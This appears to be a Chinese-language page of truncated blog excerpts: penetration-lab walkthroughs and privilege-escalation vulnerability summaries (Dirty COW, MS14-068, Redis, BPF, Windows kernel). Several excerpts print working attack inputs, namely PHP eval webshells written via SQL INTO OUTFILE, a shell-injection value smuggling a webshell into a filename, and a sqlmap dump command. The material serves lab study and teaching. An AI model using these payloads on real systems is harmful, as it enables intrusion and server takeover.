拿到靶场 直接进行扫描 爆破路径 发现 phpinfo, phpmyadmin  更具phpinfo 获取跟路径  也可以通过 输入错路径爆出绝对路径 phpmyamin  弱口令登录  root,root sql 直接写一句话木马 select  '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php' 菜刀连接   上传 ms11080.exe 提权 添加 90sec 用 mstsc 直接远程登录…
更具实验文件知道存在源码泄露  下载源码进行源码审计 发现admin账号 查看user.php 发现mysql 账号 端口 对登录后源码进行审计 发现上传文件的两处漏洞 对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 '|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||' 菜刀连接 上传脏牛提权…
下载工具包  打开目标机 通过目录爆破发现 phpmyadmin    在登录位置尝试注入 返现 可以注入 直接上sqlmap    上 bp 代理抓包 sqlmap.py  -r  bp.txt  --dbs   利用sqlmap 跑出root 密码  root666888 登录 phpmyadmin t通过路径报错得到绝对路径 c:\\www\\1.php   root  权限可以直接写一句话拿shell   让后进行udf 提权 一句话写入 菜刀连接  上传udf 提权  提权 发现 ne…
更具提示 先下载工具包 ip  172.16.12.226  打开bp 进行代理发现 整个页面 没有请求 没有其页面通过 御剑,dir ,hscan   进行目录爆破未发现有用信息    对当前页面进行代码审计发现png 二级图片路径 在对二级目录爆破 发现  upload.php 上传页面 尝试上传  把工具包内 上传    htaccess  内文件把 chopper.ccc 解析成php 文件 直接上传  返利他的dolowd.php 暴露上传后路径 直接菜刀连接 上传大马 md5解密 …
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复. 360 Vulpecker Team:Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响 为什么这个漏洞叫脏牛(Dirty COW)漏洞? Linux内核的内存子系统在处理写时拷贝…
MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二.漏洞原理 Kerberos认证原理:https://www.cnblogs.com/huamingao/p/7267423.html 服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器…
一.漏洞简介 CVE-2016-5195这个漏洞是linux内核级的本地提权漏洞,原理是linux内核内存子系统在 处理私有只读存储映射的写入时复制机制发现了一个冲突条件.这个漏洞官方给出的影响范围是在 linux内核2.6.22以后的版本都受影响,同时已经在2016年10月18日进行了修复. 二.漏洞影响 1. 没有权限的本地用户可以使用此漏洞获取写访问权限,修改制度内存映射,从而提权. 2. 改漏洞允许攻击者使用本地账户修改磁盘上的二进制文件,绕过标准权限的限制,这些权限机制通常用于防止修改…
Redis配置不当致使root被提权漏洞 Dear all~ 最近Redis服务被曝出因配置不当,可能造成数据库被恶意清空,或被黑客利用写入后门文件造成进一步入侵,请关注! 一.漏洞发布日期 2015年11月10日 二.已确认被成功利用的软件及系统 对公网开放,且未启用认证的redis服务器. 三.漏洞描述 最近Redis服务被曝出因配置不当,被攻击者进行恶意利用. 黑客借助redis内置命令,可以对现有数据进行恶意清空. 如果Redis以root身份运行,黑客可往服务器上写入SSH公钥文件,直…
一.漏洞概述 Ubuntu 16.04 版本且unprivileged_bpf_disable 权限没有关闭的情况下就会存在 提权漏洞查看方式:1,cat /proc/version 查看系统版本 2,查看是否存在unprivileged_bpf_disable文件,如果存在该文件,查看文件内容是否为1,若不是1,则存在漏洞 二.漏洞验证 1,下载poc文件 upstream44.c下载地址:http://cyseclabs.com/exploits/up ... mp;isappinstall…
windows内核提权漏洞 环境: Kali Linux(攻击机) 192.168.190.141 Windows2003SP2(靶机) 192.168.190.147 0x01寻找可利用的exp 实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权. 如下图,有一个普通用…